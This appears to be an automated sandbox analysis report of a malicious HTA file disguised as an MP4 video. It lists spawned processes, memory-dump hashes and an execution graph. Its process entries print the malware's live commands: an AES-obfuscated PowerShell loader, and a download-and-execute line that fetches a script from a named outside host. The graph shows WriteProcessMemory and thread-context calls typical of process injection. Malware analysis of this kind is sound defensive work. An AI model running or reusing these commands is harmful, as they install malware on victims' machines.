                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00 43 00
                                                                                                      Data Ascii: ~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@C
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00
                                                                                                      Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:03:25:01
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\re5.mp4.hta"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:13'312 bytes
                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:03:25:02
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129)
                                                                                                      Imagebase:0x880000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:03:25:02
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:03:25:03
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))}
                                                                                                      Imagebase:0x880000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2856842379.0000000006F90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:03:25:03
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:03:26:20
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                      Imagebase:0x880000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:03:26:37
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:powershell -exec bypass MZP
                                                                                                      Imagebase:0x880000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:03:26:37
                                                                                                      Start date:31/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Reset < >
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.2063974860.00000000069D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_69d0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction ID: 4f0f79efdf4b4e82ea224c7ce6c1ff6400e4e5ebd6fda43b78dc8948865f7c63
                                                                                                        • Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (Xxq$LRsq
                                                                                                        • API String ID: 0-4021379918
                                                                                                        • Opcode ID: 560740e8a4c20f90a3c9d054a46faa589cbdc8cb72a1bed50638fc7ba8ec09c6
                                                                                                        • Instruction ID: c8c5a82a5149885776b1055b91a03b76135914026443403043c0c5074e2445b1
                                                                                                        • Opcode Fuzzy Hash: 560740e8a4c20f90a3c9d054a46faa589cbdc8cb72a1bed50638fc7ba8ec09c6
                                                                                                        • Instruction Fuzzy Hash: B8524C74B00218CFDB24DB64C894BADBBB6BF89300F1185A9E9459B395DF34AD82CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (Xxq$LRsq
                                                                                                        • API String ID: 0-4021379918
                                                                                                        • Opcode ID: ac3b5e72bb5fe307d31ad6a19d1e524b179fcc15cafc505a5604c167f7f7b55a
                                                                                                        • Instruction ID: a3f6ce96e54b21c924ec830df4f010cdd788f4f941134ee0c8ed4c77db84b261
                                                                                                        • Opcode Fuzzy Hash: ac3b5e72bb5fe307d31ad6a19d1e524b179fcc15cafc505a5604c167f7f7b55a
                                                                                                        • Instruction Fuzzy Hash: 57516C74B002188FDB24DF68D844B9DBBB6FF88300F1185AAE545AB391DB71AD81CF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c900d9d47be9ec5fae0db035b1abc680da790e8337516a48bc0ff479e066822
                                                                                                        • Instruction ID: ca4f3eb3b6b1fd7764dbcb1d76ad4bc22d04d79b53df28eb3c614155c566e8a3
                                                                                                        • Opcode Fuzzy Hash: 6c900d9d47be9ec5fae0db035b1abc680da790e8337516a48bc0ff479e066822
                                                                                                        • Instruction Fuzzy Hash: B8D12B74A00209EFDB15DF98C884A9DFBB2FF88310F258569E905AB761C735ED81CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a2d9ab982e7916be6553750bb7894b7648af21853601b045ba94dca79c61a11f
                                                                                                        • Instruction ID: 976205e110bf2016c635ea68cdfd646780921c76021e2193b1d99bb1bd287209
                                                                                                        • Opcode Fuzzy Hash: a2d9ab982e7916be6553750bb7894b7648af21853601b045ba94dca79c61a11f
                                                                                                        • Instruction Fuzzy Hash: 22A17C74A002059FCB15CF9DC8949AEBBF2FF88310B248669E915AB365D735FC41CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5018a7a11c366bf60644e95aaddbf9128f2437a7e3d49340a609770cfe85519f
                                                                                                        • Instruction ID: 2ebeac035f85cff573b47a6bb53ea915d9b03ba7d86d815f56522d73c18e1ce8
                                                                                                        • Opcode Fuzzy Hash: 5018a7a11c366bf60644e95aaddbf9128f2437a7e3d49340a609770cfe85519f
                                                                                                        • Instruction Fuzzy Hash: FA819130A092449FCB12CF58C89099DBFB1FF49320F1981A6E945EB762C738EC85CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: baf26b7f54d6cd0ae63a0c7d86fa5e2fcecdb194ae1d22b7de49d60e64ae1ad3
                                                                                                        • Instruction ID: d4b6d0f73ce4313faf827c03d9f1acfb71240f74eca6ef52a2de688138f4c3f0
                                                                                                        • Opcode Fuzzy Hash: baf26b7f54d6cd0ae63a0c7d86fa5e2fcecdb194ae1d22b7de49d60e64ae1ad3
                                                                                                        • Instruction Fuzzy Hash: 4E415A74A001059FCB15CF99C894DAEFBB1FF48310B1582A9D915AB364C735FD51CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: af00a079b8b15341c32f0c11a05526ec62c09a7bd2758119cf75443cdfc75b42
                                                                                                        • Instruction ID: e90195f6ccf5461cfee9d4bf15fd877881602d91e244b44bb2e204b8e99425cb
                                                                                                        • Opcode Fuzzy Hash: af00a079b8b15341c32f0c11a05526ec62c09a7bd2758119cf75443cdfc75b42
                                                                                                        • Instruction Fuzzy Hash: 3C117074A402488FCB05DFA4D890AEDBFB5FF89310F145599E505BB262DB31AC51CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4079991dd439760eeed6942dd7e0a36c6355bb1f8054060039f997da58572361
                                                                                                        • Instruction ID: a203e4ec6f2719944e3c2c77da26ce5ffbfbfc0ce27866b3860477cf85598caa
                                                                                                        • Opcode Fuzzy Hash: 4079991dd439760eeed6942dd7e0a36c6355bb1f8054060039f997da58572361
                                                                                                        • Instruction Fuzzy Hash: 63E0C9B4D0820A9F8B44DFB895422AEBBF5AA08200B10857FD859E7300E63455019FD5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2052912636.00000000049F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_49f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7fe07f02d66aae619605311186519ec8eeacbfd3d8d087cf68433a6bf61525ae
                                                                                                        • Instruction ID: f9fd3dd081b81ffd7661cd1a8c090a148b01a66ba89078a736e7d6b9c4fe1208
                                                                                                        • Opcode Fuzzy Hash: 7fe07f02d66aae619605311186519ec8eeacbfd3d8d087cf68433a6bf61525ae
                                                                                                        • Instruction Fuzzy Hash: 1DE026B4E0520E9F8F48DFB995421BEFBF5AB48200F1089BE992AE3340E63456118F95

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:6.7%
                                                                                                        Total number of Nodes:164
                                                                                                        Total number of Limit Nodes:14
                                                                                                        execution_graph 72763 7566130 72764 756643b 72763->72764 72765 7566161 72763->72765 72765->72764 72770 6f73900 72765->72770 72775 6f73c07 72765->72775 72780 6f73e43 72765->72780 72785 6f738f1 72765->72785 72774 6f73938 72770->72774 72771 6f7398e 72771->72764 72772 6f73dd1 WriteProcessMemory 72773 6f73e0a 72772->72773 72773->72764 72774->72771 72774->72772 72776 6f73c20 72775->72776 72779 6f73b65 72775->72779 72777 6f73dd1 WriteProcessMemory 72778 6f73e0a 72777->72778 72778->72764 72779->72775 72779->72777 72781 6f73e66 72780->72781 72782 6f73d70 WriteProcessMemory 72780->72782 72784 6f73e0a 72782->72784 72784->72764 72786 6f73938 72785->72786 72787 6f7398e 72786->72787 72788 6f73dd1 WriteProcessMemory 72786->72788 72787->72764 72789 6f73e0a 72788->72789 72789->72764 72576 7227a2c 72577 7227a32 72576->72577 72581 71c4de0 72577->72581 72589 71c4dd1 72577->72589 72578 7227a76 72582 71c4df5 72581->72582 72597 71c5228 72582->72597 72601 71c52c1 72582->72601 72605 71c5219 72582->72605 72609 71c5767 72582->72609 72613 71c536e 72582->72613 72583 71c4e0b 72583->72578 72590 71c4df5 72589->72590 72592 71c536e 8 API calls 72590->72592 72593 71c5228 8 API calls 72590->72593 72594 71c5219 8 API calls 72590->72594 72595 71c5767 8 API calls 72590->72595 72596 71c52c1 8 API calls 72590->72596 72591 71c4e0b 72591->72578 72592->72591 72593->72591 72594->72591 72595->72591 72596->72591 72599 71c5252 72597->72599 72598 71c5297 72598->72583 72599->72598 72617 71c6858 72599->72617 72603 71c527f 72601->72603 72602 71c5297 72602->72583 72603->72602 72604 71c6858 8 API calls 72603->72604 72604->72603 72607 71c5252 72605->72607 72606 71c5297 72606->72583 72607->72606 72608 71c6858 8 API calls 72607->72608 72608->72607 72611 71c527f 72609->72611 72610 71c5297 72610->72583 72611->72610 72612 71c6858 8 API calls 72611->72612 72612->72611 72614 71c527f 72613->72614 72615 71c5297 72614->72615 72616 71c6858 8 API calls 72614->72616 72615->72583 72616->72614 72618 71c687d 72617->72618 72621 71c7110 72618->72621 72622 71c713f 72621->72622 72623 71c6d25 72621->72623 72626 71c77e0 72622->72626 72637 71c77d0 72622->72637 72627 71c77f5 72626->72627 72648 71c826f 72627->72648 72653 71c7e50 72627->72653 72659 71c85a7 72627->72659 72664 71c8b10 72627->72664 72669 71c8bdb 72627->72669 72674 71c7f97 72627->72674 72679 71c89e9 72627->72679 72684 71c882a 72627->72684 72638 71c77e0 72637->72638 72640 71c826f 2 API calls 72638->72640 72641 71c89e9 2 API calls 72638->72641 72642 71c882a 2 API calls 72638->72642 72643 71c8bdb 2 API calls 72638->72643 72644 71c7f97 2 API calls 72638->72644 72645 71c85a7 2 API calls 72638->72645 72646 71c8b10 2 API calls 72638->72646 72647 71c7e50 2 API calls 72638->72647 72639 71c7817 72639->72623 72640->72639 72641->72639 72642->72639 72643->72639 72644->72639 72645->72639 72646->72639 72647->72639 72649 71c8287 72648->72649 72689 71c9218 72649->72689 72694 71c9208 72649->72694 72650 71c829f 72654 71c87a9 72653->72654 72655 71c79ad 72653->72655 72717 7204ca0 72654->72717 72721 7204ca8 72654->72721 72656 71c880b 72660 71c85ad 72659->72660 72725 7204628 72660->72725 72729 7204620 72660->72729 72661 71c7817 72661->72623 72665 71c8b1f 72664->72665 72667 7204620 WriteProcessMemory 72665->72667 72668 7204628 WriteProcessMemory 72665->72668 72666 71c79ad 72667->72666 72668->72666 72670 71c8bea 72669->72670 72672 7204620 WriteProcessMemory 72670->72672 72673 7204628 WriteProcessMemory 72670->72673 72671 71c79ad 72672->72671 72673->72671 72675 71c7fa1 72674->72675 72733 7203d90 72675->72733 72737 7203d88 72675->72737 72676 71c8a2b 72680 71c89ff 72679->72680 72682 7203d90 Wow64SetThreadContext 72680->72682 72683 7203d88 Wow64SetThreadContext 72680->72683 72681 71c8a2b 72682->72681 72683->72681 72685 71c8839 